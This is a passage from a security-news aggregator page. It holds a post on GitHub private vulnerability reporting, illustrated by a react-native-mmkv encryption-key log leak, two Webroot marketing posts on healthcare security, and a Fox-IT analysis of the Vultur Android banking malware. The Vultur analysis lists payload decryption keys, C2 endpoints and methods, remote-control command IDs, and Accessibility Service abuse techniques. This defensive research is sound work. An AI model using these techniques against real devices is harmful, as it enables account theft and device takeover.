log with react-native-mmkv The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark. During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement: MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path, std::string cryptKey) { __android_log_print(ANDROID_LOG_INFO, "RNMMKV", "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)", instanceId.c_str(), path.c_str(), cryptKey.c_str()); std::string* pathPtr = path.size() > 0 ? &path : nullptr; {...omitted for brevity...} Figure 5: Code that initializes MMKV and also logs the encryption key Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled. With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install. This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process. Takeaways GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers). The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls. However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness. Step 1: Add a security policy Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability. GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root. We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following: We have multiple channels for receiving reports: * If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to security@example.com Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly. Step 2: Enable private reporting Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies. Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require. After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”: Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this: If you want to enable private reporting for your whole organization, then check out this documentation. A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically. On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub. This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design. Step 3: Get notifications via webhooks If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type: After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability. How to make security researchers happy If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day. If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting. If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.
Categorías: Security Posts

Overview of Content Published in March

Didier Stevens - Dom, 2024/04/14 - 12:38
Here is an overview of content I published in March:

Blog posts: SANS ISC Diary entries:
Categorías: Security Posts

3 healthcare organizations that are building cyber resilience

Webroot - Vie, 2024/04/05 - 20:15
From 2018 to 2023, healthcare data breaches have increased by 93 percent. And ransomware attacks have grown by 278 percent over the same period. Healthcare organizations can’t afford to let preventable breaches slip by. Globally, the average cost of a healthcare data breach has reached $10.93 million. The situation for healthcare organizations may seem bleak. But there is hope. Focus on layering your security posture to focus on threat prevention, protection, and recovery. Check out three healthcare organizations that are strengthening their cyber resilience with layered security tools. 1. Memorial Hermann balances user experience with encryption Email encryption keeps sensitive medical data safe and organizations compliant. Unfortunately, providers will skip it if the encryption tool is difficult to use. Memorial Hermann ran into this exact issue. Juggling compliance requirements with productivity needs, the organization worried about the user experience for email encryption. Webroot Email Encryption powered by Zix provides the solution. Nearly 75 percent of Memorial Hermann’s encrypted emails go to customers who share Webroot. Now more than 1,750 outside organizations can access encrypted email right from their inbox, with no extra steps or passwords. Read the full case study. 2. Allergy, Asthma and Sinus Center safeguards email The center needed to protect electronic medical records (EMR). But its old software solution required technical oversight that was difficult to manage. Webroot Email Threat Protection by OpenText gives the healthcare organization an easy way to keep EMR secure. OpenText’s in-house research team is continually monitoring new and emerging threats to ensure the center’s threat protection is always up to date. With high-quality protection and a low-maintenance design, the IT team can focus on other projects. When patient data is at stake, the center knows it can trust Webroot. Read the full case study. 3. Radiology Associates avoid downtime with fast recovery Radiologists need to read and interpret patient reports so they can quickly share them with doctors. Their patients’ health can’t afford for them to have downtime. After an unexpected server crash corrupted its database, Radiology Associates needed a way to avoid workflow interruptions. Carbonite Recover by OpenText helps the organization get back to business quickly in the event of a data breach or natural disaster. Plus, the price of the solution and ease of use gave Radiology Associates good reasons to choose our solution. Read the full case study. Conclusion As ransomware becomes more sophisticated and data breaches occur more frequently, healthcare organizations must stay vigilant. Strong cyber resilience should be a priority so that you can protect patient privacy and maintain trust within the healthcare industry. And you don’t have to do it alone. We’re ready to help out as your trusted cybersecurity partner. Together, we can prevent data breaches, protect sensitive data, and help you recover when disaster strikes. Contact us to learn more about our cybersecurity solutions. The post 3 healthcare organizations that are building cyber resilience appeared first on Webroot Blog.
Categorías: Security Posts

5 ways to strengthen healthcare cybersecurity

Webroot - Vie, 2024/04/05 - 19:44
Ransomware attacks are targeting healthcare organizations more frequently. The number of costly cyberattacks on US hospitals has doubled. So how do you prevent these attacks? Keep reading to learn five ways you can strengthen security at your organization. But first, let’s find out what’s at stake. Why healthcare needs better cybersecurity Healthcare organizations are especially vulnerable to data breaches because of how much data they hold. And when a breach happens, it creates financial burdens and affects regulatory compliance. On average, the cost of a healthcare data breach globally is $10.93 million. Noncompliance not only incurs more costs but also hurts patient trust. Once that trust is lost, it’s difficult to regain it, which can impact your business and standing within the industry. Adopting a layered security approach will help your organization prevent these attacks. Here are five ways to strengthen your cybersecurity: 1. Use preventive security technology Prevention, as the saying goes, prevention is better than the cure. With the right systems and the right methodology, it’s possible to detect and intercept most cyberthreats before they lead to a data breach, a loss of service, or a deterioration in patient care.
Examples of prevention-layer technologies include: 2. Provide cybersecurity training According to Verizon, 82 percent of all breaches involve a human element. Sometimes malicious insiders create security vulnerabilities. Other times, well-intentioned employees fall victim to attacks like phishing, legitimate-looking emails that trick employees into giving attackers their credentials or other sensitive information—like patient data. In fact, 16 percent of breaches start with phishing. When your employees receive basic cybersecurity training, they are more likely to recognize bad actors, report suspicious activity, and avoid risky behavior. You can outsource cybersecurity training or find an automated security training solution that you manage. 3. Ensure regulatory compliance Healthcare providers are subject to strict data privacy regulations like HIPPA and GDPR. If an avoidable data breach occurs, organizations face hefty fines from state and federal authorities. The email and endpoint protection tools described above help you stay compliant with these regulations. But sometimes a breach is out of your control. So regulators have provided guidelines for how to respond, including investigation, notification, and recovery. 4. Build business recovery plans Adding a recovery plan to your multilayered security approach is crucial to achieving and maintaining cyber resilient healthcare. Ideally, you’ll catch most incoming threats before they become an issue. However, the recovery layer is critical when threats do get through or disasters occur. You might think that your cloud-based applications back up and secure your data. But SaaS vendors explicitly state that data protection and backup is the customer’s responsibility of the customer. Some SaaS applications have recovery options, but they’re limited and ineffective. A separate backup system is necessary to ensure business continuity. Reasons for implementing a solid recovery strategy include:
  • Re-establishing patient trust.
  • Avoiding disruptions to patient care.
  • Remaining compliant with HIPPA and GDPR requirements.
Remember, lives depend on getting your systems back up quickly. That’s why your healthcare organization needs a secure, continuously updated backup and recovery solution for local and cloud servers. 5. Monitor and improve continuously Once you have your multilayered security approach in place, you’ll need a centralized management console to help you monitor and control all your security services. This single-pane-of-glass gives you real-time cyber intelligence and all the tools you need to protect your healthcare organization, your reputation, and your investment in digital transformation. You can also spot gaps in your approach and find ways to improve. Conclusion Cybersecurity can seem daunting at times. Just remember that every step you take toward cyber resilience helps you protect patient privacy and maintain your credibility within the healthcare industry.
So when you’re feeling overwhelmed or stuck, remember the five ways you can strengthen your layered cybersecurity approach:
  1. Use preventive technology like endpoint protection and email encryption.
  2. Train your employees to recognize malicious activities like phishing.
  3. Ensure that you’re compliant with HIPPA, GDPR, and any other regulation standards.
  4. Retrieve your data from breaches with backup and recovery tools.
  5. Monitor your data and improve your approach when necessary.
The post 5 ways to strengthen healthcare cybersecurity appeared first on Webroot Blog.
Categorías: Security Posts

Android Malware Vultur Expands Its Wingspan

Fox-IT - Jue, 2024/03/28 - 12:00
Authored by Joshua Kamp Executive summary The authors behind Android banking malware Vultur have been spotted adding new technical features, which allow the malware operator to further remotely interact with the victim’s mobile device. Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions. Key takeaways
  • The authors behind Vultur, an Android banker that was first discovered in March 2021, have been spotted adding new technical features.
  • New technical features include the ability to:
    • Download, upload, delete, install, and find files;
    • Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more);
    • Prevent apps from running;
    • Display a custom notification in the status bar;
    • Disable Keyguard in order to bypass lock screen security measures.
  • While the new features are mostly related to remotely interact with the victim’s device in a more flexible way, Vultur still contains the remote access functionality using AlphaVNC and ngrok that it had back in 2021.
  • Vultur has improved upon its anti-analysis and detection evasion techniques by:
    • Modifying legitimate apps (use of McAfee Security and Android Accessibility Suite package name);
    • Using native code in order to decrypt payloads;
    • Spreading malicious code over multiple payloads;
    • Using AES encryption and Base64 encoding for its C2 communication.
Introduction Vultur is one of the first Android banking malware families to include screen recording capabilities. It contains features such as keylogging and interacting with the victim’s device screen. Vultur mainly targets banking apps for keylogging and remote control. Vultur was first discovered by ThreatFabric in late March 2021. Back then, Vultur (ab)used the legitimate software products AlphaVNC and ngrok for remote access to the VNC server running on the victim’s device. Vultur was distributed through a dropper-framework called Brunhilda, responsible for hosting malicious applications on the Google Play Store [1]. The initial blog on Vultur uncovered that there is a notable connection between these two malware families, as they are both developed by the same threat actors [2]. In a recent campaign, the Brunhilda dropper is spread in a hybrid attack using both SMS and a phone call. The first SMS message guides the victim to a phone call. When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the McAfee Security app. The dropper deploys an updated version of Vultur banking malware through 3 payloads, where the final 2 Vultur payloads effectively work together by invoking each other’s functionality. The payloads are installed when the infected device has successfully registered with the Brunhilda Command-and-Control (C2) server. In the latest version of Vultur, the threat actors have added a total of 7 new C2 methods and 41 new Firebase Cloud Messaging (FCM) commands. Most of the added commands are related to remote access functionality using Android’s Accessibility Services, allowing the malware operator to remotely interact with the victim’s screen in a way that is more flexible compared to the use of AlphaVNC and ngrok. In this blog we provide a comprehensive analysis of Vultur, beginning with an overview of its infection chain. We then delve into its new features, uncover its obfuscation techniques and evasion methods, and examine its execution flow. Following that, we dissect its C2 communication, discuss detection based on YARA, and draw conclusions. Let’s soar alongside Vultur’s smarter mobile malware strategies! Infection chain In order to deceive unsuspecting individuals into installing malware, the threat actors employ a hybrid attack using two SMS messages and a phone call. First, the victim receives an SMS message that instructs them to call a number if they did not authorise a transaction involving a large amount of money. In reality, this transaction never occurred, but it creates a false sense of urgency to trick the victim into acting quickly. A second SMS is sent during the phone call, where the victim is instructed into installing a trojanised version of the McAfee Security app from a link. This application is actually Brunhilda dropper, which looks benign to the victim as it contains functionality that the original McAfee Security app would have. As illustrated below, this dropper decrypts and executes a total of 3 Vultur-related payloads, giving the threat actors total control over the victim’s mobile device. Figure 1: Visualisation of the complete infection chain. Note: communication with the C2 server occurs during every malware stage. New features in Vultur The latest updates to Vultur bring some interesting changes worth discussing. The most intriguing addition is the malware’s ability to remotely interact with the infected device through the use of Android’s Accessibility Services. The malware operator can now send commands in order to perform clicks, scrolls, swipe gestures, and more. Firebase Cloud Messaging (FCM), a messaging service provided by Google, is used for sending messages from the C2 server to the infected device. The message sent by the malware operator through FCM can contain a command, which, upon receipt, triggers the execution of corresponding functionality within the malware. This eliminates the need for an ongoing connection with the device, as can be seen from the code snippet below. Figure 2: Decompiled code snippet showing Vultur’s ability to perform clicks and scrolls using Accessibility Services. Note for this (and upcoming) screenshot(s): some variables, classes and method names were renamed by the analyst. Pink strings indicate that they were decrypted. While Vultur can still maintain an ongoing remote connection with the device through the use of AlphaVNC and ngrok, the new Accessibility Services related FCM commands provide the actor with more flexibility. In addition to its more advanced remote control capabilities, Vultur introduced file manager functionality in the latest version. The file manager feature includes the ability to download, upload, delete, install, and find files. This effectively grants the actor(s) with even more control over the infected device. Figure 3: Decompiled code snippet showing part of the file manager related functionality. Another interesting new feature is the ability to block the victim from interacting with apps on the device. Regarding this functionality, the malware operator can specify a list of apps to press back on when detected as running on the device. The actor can include custom HTML code as a “template” for blocked apps. The list of apps to block and the corresponding HTML code to be displayed is retrieved through the vnc.blocked.packages C2 method. This is then stored in the app’s SharedPreferences. If available, the HTML code related to the blocked app will be displayed in a WebView after it presses back. If no HTML code is set for the app to block, it shows a default “Temporarily Unavailable” message after pressing back. For this feature, payload #3 interacts with code defined in payload #2. Figure 4: Decompiled code snippet showing part of Vultur’s implementation for blocking apps. The use of Android’s Accessibility Services to perform RAT related functionality (such as pressing back, performing clicks and swipe gestures) is something that is not new in Android malware. In fact, it is present in most Android bankers today. The latest features in Vultur show that its actors are catching up with this trend, and are even including functionality that is less common in Android RATs and bankers, such as controlling the device volume. A full list of Vultur’s updated and new C2 methods / FCM commands can be found in the “C2 Communication” section of this blog. Obfuscation techniques & detection evasion Like a crafty bird camouflaging its nest, Vultur now employs a set of new obfuscation and detection evasion techniques when compared to its previous versions. Let’s look into some of the notable updates that set apart the latest variant from older editions of Vultur. AES encrypted and Base64 encoded HTTPS traffic In October 2022, ThreatFabric mentioned that Brunhilda started using string obfuscation using AES with a varying key in the malware samples themselves [3]. At this point in time, both Brunhilda and Vultur did not encrypt its HTTP requests. That has changed now, however, with the malware developer’s adoption of AES encryption and Base64 encoding requests in the latest variants. Figure 5: Example AES encrypted and Base64 encoded request for bot registration. By encrypting its communications, malware can evade detection of security solutions that rely on inspecting network traffic for known patterns of malicious activity. The decrypted content of the request can be seen below. Note that the list of installed apps is shown as Base64 encoded text, as this list is encoded before encryption. {"id":"6500","method":"application.register","params":{"package":"com.wsandroid.suite","device":"Android/10","model":"samsung GT-I900","country":"sv-SE","apps":"cHQubm92b2JhbmNvLm5iYXBwO3B0LnNhbnRhbmRlcnRvdHRhLm1vYmlsZXBhcnRpY3VsYXJlcztzYS5hbHJhamhpYmFuay50YWh3ZWVsYXBwO3NhLmNvbS5zZS5hbGthaHJhYmE7c2EuY29tLnN0Y3BheTtzYW1zdW5nLnNldHRpbmdzLnBhc3M7c2Ftc3VuZy5zZXR0aW5ncy5waW47c29mdGF4LnBla2FvLnBvd2VycGF5O3RzYi5tb2JpbGViYW5raW5nO3VrLmNvLmhzYmMuaHNiY3VrbW9iaWxlYmFua2luZzt1ay5jby5tYm5hLmNhcmRzZXJ2aWNlcy5hbmRyb2lkO3VrLmNvLm1ldHJvYmFua29ubGluZS5tb2JpbGUuYW5kcm9pZC5wcm9kdWN0aW9uO3VrLmNvLnNhbnRhbmRlci5zYW50YW5kZXJVSzt1ay5jby50ZXNjb21vYmlsZS5hbmRyb2lkO3VrLmNvLnRzYi5uZXdtb2JpbGViYW5rO3VzLnpvb20udmlkZW9tZWV0aW5nczt3aXQuYW5kcm9pZC5iY3BCYW5raW5nQXBwLm1pbGxlbm5pdW07d2l0LmFuZHJvaWQuYmNwQmFua2luZ0FwcC5taWxsZW5uaXVtUEw7d3d3LmluZ2RpcmVjdC5uYXRpdmVmcmFtZTtzZS5zd2VkYmFuay5tb2JpbA==","tag":"dropper2"} Utilisation of legitimate package names The dropper is a modified version of the legitimate McAfee Security app. In order to masquerade malicious actions, it contains functionality that the official McAfee Security app would have. This has proven to be effective for the threat actors, as the dropper currently has a very low detection rate when analysed on VirusTotal. Figure 6: Brunhilda dropper’s detection rate on VirusTotal. Next to modding the legitimate McAfee Security app, Vultur uses the official Android Accessibility Suite package name for its Accessibility Service. This will be further discussed in the execution flow section of this blog. Figure 7: Snippet of Vultur’s AndroidManifest.xml file, where its Accessibility Service is defined with the Android Accessibility Suite package name. Leveraging native code for payload decryption Native code is typically written in languages like C or C++, which are lower-level than Java or Kotlin, the most popular languages used for Android application development. This means that the code is closer to the machine language of the processor, thus requiring a deeper understanding of lower-level programming concepts. Brunhilda and Vultur have started using native code for decryption of payloads, likely in order to make the samples harder to reverse engineer. Distributing malicious code across multiple payloads In this blog post we show how Brunhilda drops a total of 3 Vultur-related payloads: two APK files and one DEX file. We also showcase how payload #2 and #3 can effectively work together. This fragmentation can complicate the analysis process, as multiple components must be assembled to reveal the malware’s complete functionality. Execution flow: A three-headed… bird? While previous versions of Brunhilda delivered Vultur through a single payload, the latest variant now drops Vultur in three layers. The Brunhilda dropper in this campaign is a modified version of the legitimate McAfee Security app, which makes it seem harmless to the victim upon execution as it includes functionality that the official McAfee Security app would have. Figure 8: The modded version of the McAfee Security app is launched. In the background, the infected device registers with its C2 server through the /ejr/ endpoint and the application.register method. In the related HTTP POST request, the C2 is provided with the following information:
  • Malware package name (as the dropper is a modified version of the McAfee Security app, it sends the official com.wsandroid.suite package name);
  • Android version;
  • Device model;
  • Language and country code (example: sv-SE);
  • Base64 encoded list of installed applications;
  • Tag (dropper campaign name, example: dropper2).
The server response is decrypted and stored in a SharedPreference key named 9bd25f13-c3f8-4503-ab34-4bbd63004b6e, where the value indicates whether the registration was successful or not. After successfully registering the bot with the dropper C2, the first Vultur payload is eventually decrypted and installed from an onClick() method. Figure 9: Decryption and installation of the first Vultur payload. In this sample, the encrypted data is hidden in a file named 78a01b34-2439-41c2-8ab7-d97f3ec158c6 that is stored within the app’s “assets” directory. When decrypted, this will reveal an APK file to be installed. The decryption algorithm is implemented in native code, and reveals that it uses AES/ECB/PKCS5Padding to decrypt the first embedded file. The Lib.d() function grabs a substring from index 6 to 22 of the second argument (IPIjf4QWNMWkVQN21ucmNiUDZaVw==) to get the decryption key. The key used in this sample is: QWNMWkVQN21ucmNi (key varies across samples). With this information we can decrypt the 78a01b34-2439-41c2-8ab7-d97f3ec158c6 file, which brings us another APK file to examine: the first Vultur payload. Layer 1: Vultur unveils itself The first Vultur payload also contains the application.register method. The bot registers itself again with the C2 server as observed in the dropper sample. This time, it sends the package name of the current payload (se.accessibility.app in this example), which is not a modded application. The “tag” that was related to the dropper campaign is also removed in this second registration request. The server response contains an encrypted token for further communication with the C2 server and is stored in the SharedPreference key f9078181-3126-4ff5-906e-a38051505098. Figure 10: Decompiled code snippet that shows the data to be sent to the C2 server during bot registration. The main purpose of this first payload is to obtain Accessibility Service privileges and install the next Vultur APK file. Apps with Accessibility Service permissions can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities, such as keylogging, automatically granting itself additional permissions, monitoring foreground apps and overlaying them with phishing windows. In order to gain further control over the infected device, this payload displays custom HTML code that contains instructions to enable Accessibility Services permissions. The HTML code to be displayed in a WebView is retrieved from the installer.config C2 method, where the HTML code is stored in the SharedPreference key bbd1e64e-eba3-463c-95f3-c3bbb35b5907. Figure 11: HTML code is loaded in a WebView, where the APP_NAME variable is replaced with the text “McAfee Master Protection”. In addition to the HTML content, an extra warning message is displayed to further convince the victim into enabling Accessibility Service permissions for the app. This message contains the text “Your system not safe, service McAfee Master Protection turned off. For using full device protection turn it on.” When the warning is displayed, it also sets the value of the SharedPreference key 1590d3a3-1d8e-4ee9-afde-fcc174964db4 to true. This value is later checked in the onAccessibilityEvent() method and the onServiceConnected() method of the malicious app’s Accessibility Service. ANALYST COMMENT
An important observation here, is that the malicious app is using the com.google.android.marvin.talkback package name for its Accessibility Service. This is the package name of the official Android Accessibility Suite, as can be seen from the following link: https://play.google.com/store/apps/details?id=com.google.android.marvin.talkback.
The implementation is of course different from the official Android Accessibility Suite and contains malicious code. When the Accessibility Service privileges have been enabled for the payload, it automatically grants itself additional permissions to install apps from unknown sources, and installs the next payload through the UpdateActivity. Figure 12: Decryption and installation of the second Vultur payload. The second encrypted APK is hidden in a file named data that is stored within the app’s “assets” directory. The decryption algorithm is again implemented in native code, and is the same as in the dropper. This time, it uses a different decryption key that is derived from the DXMgKBY29QYnRPR1k1STRBNTZNUw== string. The substring reveals the actual key used in this sample: Y29QYnRPR1k1STRB (key varies across samples). After decrypting, we are presented with the next layer of Vultur. Layer 2: Vultur descends The second Vultur APK contains more important functionality, such as AlphaVNC and ngrok setup, displaying of custom HTML code in WebViews, screen recording, and more. Just like the previous versions of Vultur, the latest edition still includes the ability to remotely access the infected device through AlphaVNC and ngrok. This second Vultur payload also uses the com.google.android.marvin.talkback (Android Accessibility Suite) package name for the malicious Accessibility Service. From here, there are multiple references to methods invoked from another file: the final Vultur payload. This time, the payload is not decrypted from native code. In this sample, an encrypted file named a.int is decrypted using AES/CFB/NoPadding with the decryption key SBhXcwoAiLTNIyLK (stored in SharedPreference key dffa98fe-8bf6-4ed7-8d80-bb1a83c91fbb). We have observed the same decryption key being used in multiple samples for decrypting payload #3. Figure 13: Decryption of the third Vultur payload. Furthermore, from payload #2 onwards, Vultur uses encrypted SharedPreferences for further hiding of malicious configuration related key-value pairs. Layer 3: Vultur strikes The final payload is a Dalvik Executable (DEX) file. This decrypted DEX file holds Vultur’s core functionality. It contains the references to all of the C2 methods (used in communication from bot to C2 server, in order to send or retrieve information) and FCM commands (used in communication from C2 server to bot, in order to perform actions on the infected device). An important observation here, is that code defined in payload #3 can be invoked from payload #2 and vice versa. This means that these final two files effectively work together. Figure 14: Decompiled code snippet showing some of the FCM commands implemented in Vultur payload #3. The last Vultur payload does not contain its own Accessibility Service, but it can interact with the Accessibility Service that is implemented in payload #2. C2 Communication: Vultur finds its voice When Vultur infects a device, it initiates a series of communications with its designated C2 server. Communications related to C2 methods such as application.register and vnc.blocked.packages occur using JSON-RPC 2.0 over HTTPS. These requests are sent from the infected device to the C2 server to either provide or receive information. Actual vultures lack a voice box; their vocalisations include rasping hisses and grunts [4]. While the communication in older variants of Vultur may have sounded somewhat similar to that, you could say that the threat actors have developed a voice box for the latest version of Vultur. The content of the aforementioned requests are now AES encrypted and Base64 encoded, just like the server response. Next to encrypted communication over HTTPS, the bot can receive commands via Firebase Cloud Messaging (FCM). FCM is a cross-platform messaging solution provided by Google. The FCM related commands are sent from the C2 server to the infected device to perform actions on it. During our investigation of the latest Vultur variant, we identified the C2 endpoints mentioned below. EndpointDescription/ejr/Endpoint for C2 communication using JSON-RPC 2.0.
Note: in older versions of Vultur the /rpc/ endpoint was used for similar communication./upload/Endpoint for uploading files (such as screen recording results)./version/app/?filename=ngrok&arch={DEVICE_ARCH}Endpoint for downloading the relevant version of ngrok./version/app/?filename={FILENAME}Endpoint for downloading a file specified by the payload (related to the new file manager functionality). C2 methods in Brunhilda dropper The commands below are sent from the infected device to the C2 server to either provide or receive information. MethodDescriptionapplication.registerRegisters the bot by providing the malware package name and information about the device: model, country, installed apps, Android version. It also sends a tag that is used for identifying the dropper campaign name.
Note: this method is also used once in Vultur payload #1, but without sending a tag. This method then returns a token to be used in further communication with the C2 server.application.stateSends a token value that was set as a response to the application.register command, together with a status code of “3”. C2 methods in Vultur The commands below are sent from the infected device to the C2 server to either provide or receive information. MethodDescriptionvnc.register (UPDATED)Registers the bot by providing the FCM token, malware package name and information about the device, model, country, Android version. This method has been updated in the latest version of Vultur to also include information on whether the infected device is rooted and if it is detected as an emulator.vnc.status (UPDATED)Sends the following status information about the device: if the Accessibility Service is enabled, if the Device Admin permissions are enabled, if the screen is locked, what the VNC address is. This method has been updated in the latest version of Vultur to also send information related to: active fingerprints on the device, screen resolution, time, battery percentage, network operator, location.vnc.appsSends the list of apps that are installed on the victim’s device.vnc.keylogSends the keystrokes that were obtained via keylogging.vnc.config (UPDATED)Obtains the config of the malware, such as the list of targeted applications by the keylogger and VNC. This method has been updated in the latest version of Vultur to also obtain values related to the following new keys: “packages2”, “rurl”, “recording”, “main_content”, “tvmq”.vnc.overlayObtains the HTML code for overlay injections of a specified package name using the pkg parameter. It is still unclear whether support for overlay injections is fully implemented in Vultur.vnc.overlay.logsSends the stolen credentials that were obtained via HTML overlay injections. It is still unclear whether support for overlay injections is fully implemented in Vultur.vnc.pattern (NEW)Informs the C2 server whether a PIN pattern was successfully extracted and stored in the application’s Shared Preferences.vnc.snapshot (NEW)Sends JSON data to the C2 server, which can contain:

1. Information about the accessibility event’s class, bounds, child nodes, UUID, event type, package name, text content, screen dimensions, time of the event, and if the screen is locked.
2. Recently copied text, and SharedPreferences values related to “overlay” and “keyboard”.
3. X and Y coordinates related to a click.vnc.submit (NEW)Informs the C2 server whether the bot registration was successfully submitted or if it failed.vnc.urls (NEW)Informs the C2 server about the URL bar related element IDs of either the Google Chrome or Firefox webbrowser (depending on which application triggered the accessibility event).vnc.blocked.packages (NEW)Retrieves a list of “blocked packages” from the C2 server and stores them together with custom HTML code in the application’s Shared Preferences. When one of these package names is detected as running on the victim device, the malware will automatically press the back button and display custom HTML content if available. If unavailable, a default “Temporarily Unavailable” message is displayed.vnc.fm (NEW)Sends file related information to the C2 server. File manager functionality includes downloading, uploading, installing, deleting, and finding of files.vnc.syslogSends logs.crash.logsSends logs of all content on the screen.installer.config (NEW)Retrieves the HTML code that is displayed in a WebView of the first Vultur payload. This HTML code contains instructions to enable Accessibility Services permissions. FCM commands in Vultur The commands below are sent from the C2 server to the infected device via Firebase Cloud Messaging in order to perform actions on the infected device. The new commands use IDs instead of names that describe their functionality. These command IDs are the same in different samples. CommandDescriptionregisteredReceived when the bot has been successfully registered.startStarts the VNC connection using ngrok.stopStops the VNC connection by killing the ngrok process and stopping the VNC service.unlockUnlocks the screen.deleteUninstalls the malware package.patternProvides a gesture/stroke pattern to interact with the device’s screen.109b0e16 (NEW)Presses the back button.18cb31d4 (NEW)Presses the home button.811c5170 (NEW)Shows the overview of recently opened apps.d6f665bf (NEW)Starts an app specified by the payload.1b05d6ee (NEW)Shows a black view.1b05d6da (NEW)Shows a black view that is obtained from the layout resources in Vultur payload #2.7f289af9 (NEW)Shows a WebView with HTML code loaded from SharedPreference key “946b7e8e”.dc55afc8 (NEW)Removes the active black view / WebView that was added from previous commands (after sleeping for 15 seconds).cbd534b9 (NEW)Removes the active black view / WebView that was added from previous commands (without sleeping).4bacb3d6 (NEW)Deletes an app specified by the payload.b9f92adb (NEW)Navigates to the settings of an app specified by the payload.77b58a53 (NEW)Ensures that the device stays on by acquiring a wake lock, disables keyguard, sleeps for 0,1 second, and then swipes up to unlock the device without requiring a PIN.ed346347 (NEW)Performs a click.5c900684 (NEW)Scrolls forward.d98179a8 (NEW)Scrolls backward.7994ceca (NEW)Sets the text of a specified element ID to the payload text.feba1943 (NEW)Swipes up.d403ad43 (NEW)Swipes down.4510a904 (NEW)Swipes left.753c4fa0 (NEW)Swipes right.b183a400 (NEW)Performs a stroke pattern on an element across a 3×3 grid.81d9d725 (NEW)Performs a stroke pattern based on x+y coordinates and time duration.b79c4b56 (NEW)Press-and-hold 3 times near bottom middle of the screen.1a7493e7 (NEW)Starts capturing (recording) the screen.6fa8a395 (NEW)Sets the “ShowMode” of the keyboard to 0. This allows the system to control when the soft keyboard is displayed.9b22cbb1 (NEW)Sets the “ShowMode” of the keyboard to 1. This means the soft keyboard will never be displayed (until it is turned back on).98c97da9 (NEW)Requests permissions for reading and writing external storage.7b230a3b (NEW)Request permissions to install apps from unknown sources.cc8397d4 (NEW)Opens the long-press power menu.3263f7d4 (NEW)Sets a SharedPreference value for the key “c0ee5ba1-83dd-49c8-8212-4cfd79e479c0” to the specified payload. This value is later checked for in other to determine whether the long-press power menu should be displayed (SharedPref value 1), or whether the back button must be pressed (SharedPref value 2).request_accessibility (UPDATED)Prompts the infected device with either a notification or a custom WebView that instructs the user to enable accessibility services for the malicious app. The related WebView component was not present in older versions of Vultur.announcement (NEW)Updates the value for the C2 domain in the 